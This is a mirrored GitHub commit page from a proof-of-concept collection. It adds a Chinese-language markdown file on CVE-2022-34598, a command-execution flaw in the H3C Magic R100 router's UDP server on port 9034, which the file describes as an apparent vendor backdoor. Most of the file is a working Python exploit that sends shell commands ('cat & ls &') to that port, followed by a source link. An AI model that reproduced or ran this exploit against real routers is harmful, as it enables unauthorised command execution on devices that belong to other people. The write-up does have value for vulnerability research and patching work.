mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598).md
This commit is contained in:
wy876
GitHub
parent
5bcb087872
commit
4ebb993d3a
22
H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598).md
Normal file
22
H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598).md
Normal file
@ -0,0 +1,22 @@
|
|||||||
|
## H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)
|
||||||
|
|
||||||
|
H3C Magic R100 存在安全漏洞,该漏洞源于updserver服务打开了疑似官方后门的9034端口,允许攻击者执行任意命令。
|
||||||
|
|
||||||
|
## exp
|
||||||
|
```
|
||||||
|
import socket
|
||||||
|
|
||||||
|
Ip="0.0.0.0"
|
||||||
|
Port=9034
|
||||||
|
|
||||||
|
msg=b"cat & ls &"
|
||||||
|
server_address=(Ip,Port)
|
||||||
|
|
||||||
|
udp_socket=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||||
|
udp_socket.sendto(msg,server_address)
|
||||||
|
|
||||||
|
udp_socket.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
## 漏洞来源
|
||||||
|
- https://the-itach1.github.io/2022/09/05/CVE-2022-34598%20H3C%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
|
||||||
Loading…
x
Reference in New Issue
Block a user